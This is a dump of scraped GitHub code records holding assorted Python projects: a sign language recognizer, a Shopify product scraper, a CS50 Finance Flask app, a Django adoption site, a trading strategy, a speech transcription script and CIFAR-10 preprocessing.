items\n\n#--------------------------------------------------------------------------------------------------\n\n","repo_name":"adovgeldiyev/recommender-systems","sub_path":"Neighborhood models project/KNNRecommender.py","file_name":"KNNRecommender.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34641920865","text":"import cv2\nimport numpy as np\nimport sys\nfrom skimage import exposure\nfrom skimage import feature\nimport pandas as pd\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.model_selection import cross_val_score\n\n\nf = open('sign.txt','w+')\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\ndef LBP(image, eps=1e-7, numPoints=32, radius=8):\n # compute the Local Binary Pattern representation\n # of the image, and then use the LBP representation\n # to build the histogram of patterns\n lbp = feature.local_binary_pattern(image, numPoints,radius, method=\"uniform\")\n (hist, _) = np.histogram(lbp.ravel(), bins=np.arange(0, numPoints + 3), range=(0, numPoints + 2))\n # normalize the histogram\n hist = hist.astype(\"float\")\n hist /= (hist.sum() + eps)\n\n # return the histogram of Local Binary Patterns\n return hist\n\n\ndf = pd.read_csv('datasetToLearn.csv',header=None)\nX = df.iloc[:,:-1] \nY = df.iloc[:,-1] \netc = ExtraTreesClassifier(n_estimators=1000)\nscores = cross_val_score(etc, X, Y, cv=10)\nprint('Extra Tree',\"Mean CV Score: {:.3f}\".format(scores.mean()))\netc.fit(X, Y)\n\ncap = cv2.VideoCapture(0)\nwhile(1):\n #Capture frames from the camera\n ret, frame = cap.read()\n #img = cv2.flip(frame,1)\n img=frame.copy()\n kernel = np.ones((5,5),np.uint8)\n\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray,(5,5),0)\n frameHSV = cv2.cvtColor(img,cv2.COLOR_BGR2YCR_CB) \n\n skin_min = np.array([0,133,77],np.uint8) #100, 133, 100\n skin_max = np.array([255,173,127],np.uint8) #255, 255, 255 \n\n #Thresholding based on skin color\n threshSkinColor = cv2.inRange(frameHSV, skin_min, skin_max)\n #Closing and Opening the image to eliminate internal noise\n threshSkinColor = cv2.morphologyEx(threshSkinColor, cv2.MORPH_CLOSE, kernel)\n threshSkinColor = cv2.morphologyEx(threshSkinColor, cv2.MORPH_OPEN, kernel)\n\n _,contours, hierarchy = cv2.findContours(threshSkinColor,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\n max_area = 0\n for i in range(len(contours)):\n cnt=contours[i]\n area = 
cv2.contourArea(cnt)\n if(area>max_area):\n max_area=area\n ci=i\n cnt=contours[ci]\n\n if('cnt' in globals()):\n #Hand Mask is initially made using skin color alone\n handMask = np.zeros(img.shape[:2],np.uint8)\n cv2.fillPoly(handMask, pts =[cnt], color=(255,255,255))\n handMask = cv2.inRange(handMask, 1, 255)\n res = cv2.bitwise_and(img,img,mask = handMask)\n x,y,w,h = cv2.boundingRect(cnt) \n crop_img = res[y:y+h, x:x+w]\n crop_img = cv2.resize(crop_img, (64,64)) \n \n \n gray = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY) \n #LBPfeatures = LBP(gray) \n #HOG\n (H, hogImage) = feature.hog(gray,orientations=9, pixels_per_cell=(8, 8),cells_per_block=(2, 2), transform_sqrt=True, visualise=True)\n hogImage = exposure.rescale_intensity(hogImage, out_range=(0, 255))\n hogImage = hogImage.astype(\"uint8\")\n #showImage(hogImage,1,\"HOG\")\n cv2.imshow(\"HOG\",hogImage)\n HOGfeatures = np.ravel(hogImage)\n \n #features = np.append(HOGfeatures,LBPfeatures)\n predicted = etc.predict([HOGfeatures])\n #showImage(res,2,\"Final answer\")\n cv2.putText(res,str(predicted),(100,100),font,2,(255,255,255),2)\n \n cv2.imshow(\"Final\",res)\n k = cv2.waitKey(5) & 0xFF\n \n if k == 27:\n f.write(str(predicted))\n \n if(predicted == 5):\n break\n\n\ncap.release()\ncv2.destroyAllWindows()\nf.close()\n\"\"\"\nhull = cv2.convexHull(cnt,returnPoints = False) \n #hull2 = cv2.convexHull(cnts,returnPoints = False)\n defects = cv2.convexityDefects(cnt,hull)\n print(defects.shape)\"\"\"\n","repo_name":"aravindhank11/Sign-Language-Recognition","sub_path":"CODES/realTimePrediction.py","file_name":"realTimePrediction.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"24728471930","text":"#function to find the keys based on the value in the dictionaryObject\r\ndef getKeysByValue(dictionaryObject, valueToFind):\r\n listOfKeys = list()\r\n listOfItems = dictionaryObject.items()\r\n for item in listOfItems:\r\n if item[1] == valueToFind:\r\n listOfKeys.append(item[0])\r\n return listOfKeys\r\n\r\n#Program\r\nimport csv \r\ninputFiles=['Input1.csv','Input2.csv','Input3.csv']\r\nfor iFile in inputFiles:\r\n # instantiating variables i as int, inputDictionary, computedDictionary as dictionary objects, temp as empty string object.\r\n #Instantiated dictionary object is by default an empty list\r\n groupIndex, inputDictionary, computedDictionary, temp=0,{},{},'';\r\n print(\"--------------------------------------------------------------------------------\")\r\n print(\"----------------------- START OF {} TEST FILE -----------------------------\".format(iFile))\r\n # Open input file in read mode, assumption is the input file is a legal, csv formatted.\r\n with open(iFile, 'r') as csvfile:\r\n csvreader = csv.reader(csvfile, delimiter=',')\r\n # next(csvreader) # UnComment this line if the input file has file header\r\n for row in csvreader: \r\n #Read each row as key value pair dictionary object with Key as ID, and value as entire row. 
\r\n inputDictionary[row[0]]=row\r\n #codeblock to create computedDictionary object, with key as ID, and Value as FIRSTNAMELASTNAME\r\n temp=row[1]\r\n if (temp.count(\"^\")>1): \r\n computedDictionary[row[0]]=temp[0:temp.rindex(\"^\")].replace(\"^\",\"\").upper() \r\n else :\r\n computedDictionary[row[0]]=temp.replace(\"^\",\"\").upper()\r\n\t #Using set to get only uniqueValues\r\n uniquePatients = set(computedDictionary.values())\r\n\t #Iterating through each value/patient from list of UniquePatients/Values\r\n for patient in uniquePatients:\r\n\t\t#Print groupIndex to match the expected output\r\n print(\"{} :\".format(groupIndex))\r\n groupIndex+=1\r\n\t\t#Call to function to get the uniqueKeys by Value in the dictionaryObject\r\n listOfKeys = getKeysByValue(computedDictionary, patient)\r\n for key in listOfKeys:\r\n print(inputDictionary[key])\r\n print(\"----------------------- END OF {} TEST INPUT FILE -----------------------------\".format(iFile))\r\n print(\"--------------------------------------------------------------------------------\")\r\n ","repo_name":"crathan/DataChallenge","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34575881490","text":"\"\"\"\nAuthor: Youssef Abbas \nGitHuv : https://github.com/jooabbas99\nShopify Products scrapping \n\nHOW TO USE : \npython3 shopify_scraper.py [DOMAIN]\n\"\"\"\nimport sys\nimport requests\nimport json\nif __name__ == '__main__':\n domian = sys.argv[1]\n products = []\n i = 1\n while(True):\n url = f'https://{domian}/products.json?limit=250&page={i}'\n data = requests.get(url)\n if len(data.json()['products']) == 0:\n break\n json_data = data.json()\n\n for j in json_data['products']:\n products.append(j)\n i += 1 \n print('items found : ' + str(len(products)))\n with open(f'{domian}_products.json', 'w') as f:\n json.dump(products, f)\n \n","repo_name":"jooabbas99/shopify-scrapping","sub_path":"shppify_scraper.py","file_name":"shppify_scraper.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"40642226793","text":"import os\n\nfrom cs50 import SQL\nfrom flask import Flask, flash, jsonify, redirect, render_template, request, session\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError\nfrom werkzeug.security import check_password_hash, generate_password_hash\nfrom datetime import datetime\n\nfrom helpers import apology, login_required, lookup, usd, format_datetime\n\n# Configure application\napp = Flask(__name__)\n\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n\n# Ensure responses aren't cached\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n# Custom filter\napp.jinja_env.filters[\"usd\"] = usd\napp.jinja_env.filters[\"datetime\"] = format_datetime\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Configure CS50 Library to use SQLite database\ndb = SQL(\"sqlite:///finance.db\")\n\n# code-first 
set-up for the database\nsql_setup_queries = [\"\"\"\\\n CREATE TABLE IF NOT EXISTS users(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n username TEXT NOT NULL UNIQUE,\n hash TEXT NOT NULL,\n cash NUMERIC NOT NULL DEFAULT 10000.00\n )\"\"\",\n \"\"\"\\\n CREATE TABLE IF NOT EXISTS exchanges(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n name VARCHAR(255) UNIQUE NOT NULL\n )\"\"\",\n \"\"\"\\\n CREATE TABLE IF NOT EXISTS symbols(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n symbol CHAR(25) NOT NULL,\n exchange_id INTEGER NOT NULL,\n FOREIGN KEY(exchange_id) REFERENCES exchanges(id)\n )\"\"\",\n \"\"\"\\\n CREATE TABLE IF NOT EXISTS purchases(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n shares INTEGER NOT NULL,\n price DOUBLE PRECISION NOT NULL,\n transaction_date DATETIME DEFAULT CURRENT_TIMESTAMP,\n symbol_id INTEGER NOT NULL,\n user_id INTEGER NOT NULL,\n FOREIGN KEY(symbol_id) REFERENCES symbols(id),\n FOREIGN KEY(user_id) REFERENCES users(id)\n )\"\"\",\n \"\"\"\\\n INSERT INTO exchanges ( name )\n SELECT 'IEX Cloud' WHERE NOT EXISTS(SELECT * FROM exchanges WHERE name='IEX Cloud')\n\"\"\"]\n\nfor query in sql_setup_queries:\n db.execute(query)\n\n# Make sure API key is set\nif not os.environ.get(\"API_KEY\"):\n raise RuntimeError(\"API_KEY not set\")\n\n\n@app.route(\"/\")\n@login_required\ndef index():\n \"\"\"Show portfolio of stocks\"\"\"\n user_summary = get_user_summary()\n\n if user_summary:\n return render_template(\"index.html\", summary=user_summary[\"summary\"], cash=user_summary[\"cash\"], total_stock_value=user_summary[\"total_stock_value\"], total_value=user_summary[\"total_value\"])\n else:\n return apology(\"Server error\", 500)\n\n\n@app.route(\"/buy\", methods=[\"GET\", \"POST\"])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == \"POST\":\n errors = []\n symbol = request.form.get(\"symbol\")\n exchange_name = 'IEX Cloud'\n\n # convert the query param to an integer\n try:\n shares = int(request.form.get(\"shares\"))\n except ValueError:\n # if an invalid string (e.g. 
alphabetic, fractional)\n # define shares as None so the error gets logged below\n shares = None\n\n if not symbol:\n errors.append(\"Please enter the symbol of a stock to purchase\")\n if not shares or shares <= 0:\n errors.append(\"Please enter a positive integer of shares to purchase\")\n\n # display any form validation errors\n if len(errors) > 0:\n return apology(\"\\n\".join(errors), 400)\n\n # call lookup to check that the symbol price and\n quote = lookup(symbol)\n\n if not quote:\n errors.append(\"Please enter a valid stock symbol\")\n else:\n # now spend the resources to get the user data from the db\n user = get_user_by_id(session.get(\"user_id\"))\n\n # calculate the total cost of the requested purchase\n # and reject if user does not have the available funds\n total_cost = shares * quote[\"price\"]\n if user[\"cash\"] < total_cost:\n errors.append(\"Insufficient funds\")\n\n # complex errors\n if len(errors) > 0:\n return apology(\"\\n\".join(errors), 400)\n\n # insert the purchase into the user's buy table\n # and update their total cash on hand\n newTotal = user[\"cash\"] - total_cost\n insert_purchase((shares, quote, exchange_name), user)\n\n # update the user's cash record\n update_cash(-(shares * quote[\"price\"]), user)\n\n # redirect so user can see the new purchase in the history table\n return redirect(\"/buy\")\n else:\n user_summary = get_user_summary()\n if user_summary:\n return render_template(\"buy.html\", summary=user_summary[\"summary\"], cash=user_summary[\"cash\"], total_stock_value=user_summary[\"total_stock_value\"], total_value=user_summary[\"total_value\"])\n else:\n return apology(\"Server Error\", 500)\n\n\n@app.route(\"/check\", methods=[\"GET\"])\ndef check():\n \"\"\"Return true if username available, else false, in JSON format\"\"\"\n username = request.args.get(\"username\").strip()\n result = False\n\n if len(username) > 0:\n query_result = db.execute(\"SELECT COUNT(*) AS count FROM users WHERE username = :qUsername\", qUsername=username)[0]\n if query_result[\"count\"] == 0:\n result = True\n\n return jsonify(result)\n\n\n@app.route(\"/history\")\n@login_required\ndef history():\n \"\"\"Show history of transactions\"\"\"\n user = get_user_by_id(session.get(\"user_id\"))\n history_query = \"\"\"SELECT s.symbol AS symbol, p.shares AS shares, p.price AS price, p.transaction_date AS date FROM purchases AS p\n INNER JOIN symbols AS s ON s.id = p.symbol_id\n WHERE user_id = :qUserId\n ORDER BY p.transaction_date DESC\"\"\"\n history = db.execute(history_query, qUserId=user[\"id\"])\n\n for purchase in history:\n purchase[\"value\"] = purchase[\"price\"] * purchase[\"shares\"]\n purchase[\"date\"] = datetime.strptime(purchase[\"date\"], \"%Y-%m-%d %H:%M:%S\")\n\n return render_template('/history.html', history=history)\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Log user in\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n\n # Ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\", 400)\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 400)\n\n # Query database for username\n user = get_user_by_username(request.form.get(\"username\"))\n\n # Ensure username exists and password is correct\n if not user or not check_password_hash(user[\"hash\"], request.form.get(\"password\")):\n return 
apology(\"invalid username and/or password\", 400)\n\n # Remember which user has logged in\n session[\"user_id\"] = user[\"id\"]\n\n # Redirect user to home page\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n \"\"\"Log user out\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # Redirect user to login form\n return redirect(\"/\")\n\n\n@app.route(\"/quote\", methods=[\"GET\", \"POST\"])\n@login_required\ndef quote():\n \"\"\"Get stock quote.\"\"\"\n if request.method == \"POST\":\n q = request.form.get(\"symbol\").strip()\n results = [] # using a list in anticipation that there might be some way to do more of a 'search' method in the future\n error = \"\"\n\n # if no query, then there's no sense in asking the database\n if q:\n from_api = lookup(q)\n\n if from_api:\n results.append(from_api)\n else:\n error = \"Stock ticker symbol required\"\n\n if not error and len(results) == 0:\n error = \"Invalid stock ticker\"\n\n if error:\n return apology(error, 400)\n\n return render_template(\"quote.html\", query=q, results=results)\n else:\n return render_template(\"quote.html\")\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n \"\"\"Register user\"\"\"\n if request.method == \"POST\":\n username = request.form.get(\"username\")\n password = request.form.get(\"password\")\n confirmation = request.form.get(\"confirmation\")\n errors = []\n\n if not username:\n errors.append(\"Username is required\")\n elif get_user_by_username(username):\n errors.append(\"Username is already taken\")\n\n if not password:\n errors.append(\"Password is required\")\n if not confirmation:\n errors.append(\"Password confirmation required\")\n if password and confirmation and password != confirmation:\n errors.append(\"Password and confirmation did not match\")\n\n # if any form errors exist return them as an apology page\n if len(errors) > 0:\n return apology(\"\\n\".join(errors), 400)\n\n # otherwise no errors, so insert the new user\n db.execute(\"INSERT INTO users (username, hash) VALUES (:qUsername, :qHash)\",\n qUsername=username, qHash=generate_password_hash(password))\n\n # and log them in\n return login()\n else:\n return render_template(\"register.html\")\n\n\n@app.route(\"/sell\", methods=[\"GET\", \"POST\"])\n@login_required\ndef sell():\n \"\"\"Sell shares of stock\"\"\"\n\n if request.method == \"POST\":\n symbol = request.form.get(\"symbol\")\n exchange_name = 'IEX Cloud'\n shares = int(request.form.get(\"shares\"))\n errors = []\n\n # validate the form fields and return errors if necessary\n if not symbol:\n errors.append(\"Please enter a symbol\")\n if not shares or shares <= 0:\n errors.append(\"Please enter a positive number of shares to sell\")\n\n if len(errors) > 0:\n return apology(\"\\n\".join(errors), 400)\n\n user_id = session.get(\"user_id\")\n query = \"\"\"SELECT s.symbol AS symbol, SUM(p.shares) AS total_shares FROM purchases AS p\n INNER JOIN symbols AS s ON s.id = p.symbol_id\n WHERE s.symbol = :qSymbol AND p.user_id = :qUserId\n GROUP BY p.symbol_id\n HAVING SUM(p.shares) > :qQuantity\"\"\"\n existing_shares = db.execute(query, qQuantity=shares, qSymbol=symbol, qUserId=user_id)\n\n if len(existing_shares) == 0:\n return apology(\"You do not have enough shares to sell\", 400)\n\n # retrieve current price\n quote = lookup(symbol)\n if quote:\n # add the sales 'purchase' record (aka purchase of USD)\n user = 
get_user_by_id(user_id)\n purchase_details = (-shares, quote, exchange_name)\n insert_purchase(purchase_details, user)\n\n # update the user's cash record\n update_cash(shares * quote[\"price\"], user)\n\n # return render_template(\"sell.html\")\n return redirect(\"/sell\")\n else:\n user_summary = get_user_summary()\n if user_summary:\n return render_template(\"sell.html\", summary=user_summary[\"summary\"], cash=user_summary[\"cash\"], total_stock_value=user_summary[\"total_stock_value\"], total_value=user_summary[\"total_value\"])\n else:\n return apology(\"Server Error\", 500)\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n if not isinstance(e, HTTPException):\n e = InternalServerError()\n return apology(e.name, e.code)\n\n\n# Listen for errors\nfor code in default_exceptions:\n app.errorhandler(code)(errorhandler)\n\n\ndef get_user_by_username(username):\n rows = db.execute(\"SELECT * FROM users WHERE username = :qUsername\", qUsername=username)\n\n if len(rows) != 1:\n return None\n else:\n return rows[0]\n\n\ndef get_user_by_id(id):\n rows = db.execute(\"SELECT * FROM users WHERE id = :qId\", qId=id)\n\n if len(rows) != 1:\n return None\n else:\n return rows[0]\n\n\n# during a purchas add will be negative in order to subtract the total cost from cash\ndef update_cash(add, user):\n new_value = user[\"cash\"] + add\n db.execute(\"UPDATE users SET cash = :qNewCash WHERE id = :qUserId\", qNewCash=new_value, qUserId=user[\"id\"])\n\n\n# accepts a tuple of the purchase details and the user_id to assign\n# the purchase to\ndef insert_purchase(details, user):\n shares, quote, exchange_name = details\n\n # get the symbol id\n symbol = quote[\"symbol\"]\n symbol_id = get_symbol_id(symbol, exchange_name)\n\n # insert the new purhase record\n db.execute(\"INSERT INTO purchases ( shares, price, symbol_id, user_id ) VALUES ( :qShares, :qPrice, :qSymbolId, :qUserId )\",\n qShares=shares, qPrice=quote[\"price\"], qSymbolId=symbol_id, qUserId=user[\"id\"])\n\n\n# TODO update with transactions and table locks\n# gets the symbol id from the database; inserts the symbol and exchange if necessary\ndef get_symbol_id(symbol, exchange):\n exchange_id = get_exchange_id(exchange)\n rows = db.execute(\"SELECT id FROM symbols WHERE symbol = :qSymbol AND exchange_id = :qExchangeId\",\n qSymbol=symbol, qExchangeId=exchange_id)\n\n if len(rows) == 0:\n symbol_id = db.execute(\"INSERT INTO symbols ( symbol, exchange_id ) VALUES ( :qSymbol, :qExchangeId )\",\n qSymbol=symbol, qExchangeId=exchange_id)\n elif len(rows) == 1:\n symbol_id = rows[0][\"id\"]\n else:\n return apology(\"A database error occurred with the symbol\", 500)\n\n return symbol_id\n\n\n# gets the exchange id from the database; inserts the exchange if necessary\ndef get_exchange_id(exchange_name):\n rows = db.execute(\"SELECT id FROM exchanges WHERE name = :qName\", qName=exchange_name)\n\n if len(rows) == 0:\n exchange_id = db.execute(\"INSERT INTO exchanges ( name ) OUTPUT Inserted.ID VALUES ( :qName )\", qName=exchange_name)\n elif len(rows) == 1:\n exchange_id = rows[0][\"id\"]\n else:\n return apology(\"A database error occurred with the exchange\", 500)\n\n return exchange_id\n\n\n# returns a financial summary for the user as a dict\ndef get_user_summary():\n user = get_user_by_id(session.get(\"user_id\"))\n\n if user:\n summary_query = \"\"\"SELECT symbol.id, symbol.symbol AS symbol, SUM(purchase.shares) AS shares FROM purchases AS purchase\n INNER JOIN symbols AS symbol ON symbol.id = purchase.symbol_id\n WHERE purchase.user_id = 
:qUserId\n GROUP BY purchase.symbol_id\n HAVING SUM(purchase.shares) > 0\"\"\"\n summary = db.execute(summary_query, qUserId=user[\"id\"])\n\n # calculate the current total stock value across all stocks\n total_stock_value = 0\n\n for row in summary:\n quote = lookup(row[\"symbol\"])\n\n if quote:\n row[\"value\"] = quote[\"price\"] * row[\"shares\"]\n total_stock_value += row[\"value\"]\n row[\"company_name\"] = quote[\"name\"]\n row[\"price\"] = quote[\"price\"]\n\n total_value = user[\"cash\"] + total_stock_value\n\n return {\n \"summary\": summary,\n \"cash\": user[\"cash\"],\n \"total_stock_value\": total_stock_value,\n \"total_value\": total_value\n }\n else:\n return None","repo_name":"murskyfuller/cs50","sub_path":"lecture 8/problem set/finance/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":15848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26087720985","text":"from strategies import Strategy\nfrom indicators.EMA import EMA\nfrom indicators.ATR import ATR\nfrom common.instruments import Bar\nfrom common.base import Order\nimport logging\n\nclass BasicEma(Strategy):\n STRATEGY_NAME = 'BasicEma'\n\n def __init__(self):\n self._logger = logging.getLogger('basicEma')\n\n def start(self, engine):\n self.logger.info('Starts')\n self._name = BasicEma.STRATEGY_NAME\n\n # setup the indicators\n self._ema_short = EMA(12, Bar.CLOSE) # 12\n self._ema_long = EMA(26, Bar.CLOSE) # 26\n self._atr = ATR(12, Bar.CLOSE)\n\n def newBar(self, instrument, cur_index):\n # update indicators\n self.ema_short.update(instrument, cur_index)\n self.ema_long.update(instrument, cur_index)\n self.atr.update(instrument, cur_index)\n\n def execute(self, engine, instruments, cur_index):\n atr = self.atr.getLast()\n if atr:\n # Go through all instruments\n for instrument in instruments.itervalues():\n order = None\n take_proffit = atr * 3\n stop_loss = atr * 1\n units = 100\n # crossing up\n if self.ema_short.crossUp(self.ema_long):\n order = Order(engine, instrument, cur_index, units, Order.BUY, take_proffit, stop_loss)\n # crossing down\n elif self.ema_short.crossDown(self.ema_long):\n order = Order(engine, instrument, cur_index, units, Order.SELL, take_proffit, stop_loss)\n\n # make sure theres no open orders with this instrument\n if order:# and not (engine.existsOrder(order) or engine.existsOppositeOrder(order)):\n engine.createOrder(order)\n\n def end(self, engine):\n self.logger.info('Ends')\n pass\n\n # -------------------------------- properties -------------------\n\n @property\n def logger(self):\n return self._logger\n\n @property\n def name(self):\n return self._name\n\n @property\n def ema_short(self):\n return self._ema_short\n\n @property\n def ema_long(self):\n return self._ema_long\n\n @property\n def atr(self):\n return self._atr","repo_name":"acanalda/pytrader","sub_path":"strategies/basicEma.py","file_name":"basicEma.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31931934223","text":"# CASE STUDY\n# Zomato with python storage containers\n\n\npromo_codes = [\"WELCOME50\", \"ZOMPAYTM\", \"BINGO\", \"JUMBO\"]\n\ndish1 = {\n \"name\": \"Aloo tikki\",\n \"price\": 100,\n \"ratings\": 3.7\n\n}\n\ndish2 = {\n \"name\": \"Mcpuff\",\n \"price\": 150,\n \"ratings\": 3.9\n}\n\ndish3 = {\n \"name\": \"Mcveggie wrap\",\n \"price\": 240,\n \"ratings\": 4.7\n\n}\nmenu = [dish1, dish2, dish3, {\"name\": 
\"McEgg\", \"price\": 300, \"ratings\": 5.1}]\nrestaurant = {\n \"name\": \"McDonalds\",\n \"Address\": \"Ansal Plaza, Ludhiana\",\n \"description\": \"Burger , fast food\",\n \"ratings\": 4.5,\n \"menu\": menu,\n \"promo_codes\": promo_codes\n}\n\nprint(restaurant)\n","repo_name":"Dashyam/GWPDS","sub_path":"Session2D.py","file_name":"Session2D.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19540470681","text":"from django.shortcuts import render, redirect\nfrom .models import Animal\nfrom services.models import PontoAcesso, Depoimento\nfrom .forms import AnimalForm, MotivoForm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required \nfrom accounts.models import Perfil\nfrom services.forms import ContatoForm\nfrom .utils import filtro_animal, paginacao\n\ndef lista_animal(request):\n categorias = {}\n ids = []\n lista_de_animais = Animal.objects.all()\n\n if request.method == 'POST':\n lista_de_animais = filtro_animal(request, lista_de_animais)\n\n animais = paginacao(request, lista_de_animais)\n \n #transformando as categorias em dicionário para trabalhar com javascript\n for animal in lista_de_animais:\n categorias[animal.id] = animal.categoria\n ids.append(animal.id)\n\n contexto = {\n 'animais': animais,\n 'categorias': categorias,\n 'ids': ids,\n }\n return render(request, 'index.html', contexto)\n\n\n@login_required\ndef cadastro_animal(request):\n\n form = AnimalForm(request.POST or None, request.FILES)\n\n if request.method == 'POST' and form.is_valid():\n try:\n user = User.objects.get(id=request.user.id)\n animal = form.save(commit=False)\n animal.usuario = user\n animal.save()\n return redirect('cadastro-motivo', animal.id)\n except:\n return HttpResponse(status=500)\n\n return render(request, 'cadastro-animal.html', {'form':form})\n\n@login_required\ndef cadastro_motivo(request, id):\n form = MotivoForm(request.POST or None)\n \n if request.method == 'POST' and form.is_valid():\n try:\n animal = Animal.objects.get(id=id)\n motivo = form.save(commit=False)\n motivo.animal_id = animal\n motivo.save()\n return redirect('/')\n except:\n return HttpResponse(status=500)\n\n return render(request, 'motivo.html', {'form':form}) \n\ndef contato(request):\n\n form = ContatoForm(request.POST or None)\n\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return redirect('/')\n\n contexto = {\n 'form':form\n }\n\n return render(request, 'entre-em-contato.html', contexto)\n\n\ndef doe(request):\n pontos = PontoAcesso.objects.exclude(tipo_ponto='PA')\n \n contexto = {\n 'pontos':pontos\n }\n\n return render(request, 'doe.html', contexto)\n\ndef incentivo(request):\n pontos = PontoAcesso.objects.exclude(tipo_ponto='PD')\n depoimentos = Depoimento.objects.all()\n\n contexto = {\n 'pontos':pontos,\n 'depoimentos': depoimentos,\n }\n\n return render(request, 'incentivo.html', contexto)\n \ndef sobre(request):\n return render(request, 'sobre.html')\n\ndef handler404(request, exception):\n return render(request, 'erro.html')\n\ndef handler500(request):\n return render(request, 'erro.html')","repo_name":"LuizFelipeGondim/AUline","sub_path":"publications/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17038867583","text":"import sys\nimport asyncio\nfrom deepgram import Deepgram\nimport 
json\n\nDEEPGRAM_API_KEY = 'e9312877e73293d229ed0e89fffc093ca7e420dd'\nFILE = 'cume.wav'\nMIMETYPE = 'audio/wav'\n\nasync def main():\n deepgram = Deepgram(DEEPGRAM_API_KEY)\n\n if FILE.startswith('http'):\n source = {'url': FILE}\n else:\n audio = open(FILE, 'rb')\n source = {'buffer': audio, 'mimetype': MIMETYPE}\n\n response = await asyncio.create_task(\n deepgram.transcription.prerecorded(\n source,\n {\n 'punctuate': True,\n 'language': 'pt'\n }\n )\n )\n\n words = [\n word['word'] for word in response['results']['channels'][0]['alternatives'][0]['words']\n ]\n\n transcribed_text = ' '.join(words)\n\n with open('transcricao.txt', 'w', encoding='utf-8') as output_file:\n output_file.write(transcribed_text)\n\n print('Transcrição salva em transcricao.txt')\n print(json.dumps(response, indent=4))\n\ntry:\n asyncio.run(main())\nexcept Exception as e:\n exception_type, exception_object, exception_traceback = sys.exc_info()\n line_number = exception_traceback.tb_lineno\n print(f'line {line_number}: {exception_type} - {e}')\n","repo_name":"ASanderO/Leitura-de-PDF","sub_path":"speech.py","file_name":"speech.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40601812362","text":"\n# coding: utf-8\n\n# In[5]:\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nimport cv2\nimport math\nimport random\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split \nimport argparse\nfrom classification_functions import *\n\n\ndef load_preprocess_and_visualize(base_path,fraction):\n #Load data\n train_data,train_labels = load_cf10_data(base_path, type=\"train\")\n test_data, test_labels = load_cf10_data(base_path, type=\"test\")\n assert(len(train_data) == len(train_labels))\n assert(len(test_data) == len(test_labels))\n print(\"Train data shape: {}\".format(train_data.shape))\n print(\"Test data shape: {} \".format(test_data.shape))\n #Visualize data\n \n print(\"Visualizing data......\")\n fig = visualize_cf10(train_data,train_labels)\n fig.suptitle('Samples of cfar10 dataset', fontsize=20)\n plt.ion()\n plt.show()\n plt.pause(0.001)\n input(\"Press [enter] to continue.\")\n\n #Plot data\n print(\"Plotting histogram..........\")\n fig = plot_cf10_data(train_labels,test_labels)\n fig.suptitle('Bar Chart of Train and Test Data', fontsize=20)\n plt.ion()\n plt.show()\n plt.pause(0.001)\n input(\"Press [enter] to continue.\")\n \n\n\n ### Augment training data and display augmented data\n print(\"Running data augmentation........\")\n data,labels = augment_data(train_data,train_labels,fraction)\n train_data = np.vstack((train_data, data))\n train_labels = np.hstack((train_labels,labels))\n assert(len(train_data) == len(train_labels))\n print(\"Augmented Train data shape: {}\".format(train_data.shape))\n print(\"Augemented Train labels shape: {}\".format(train_labels.shape))\n\n 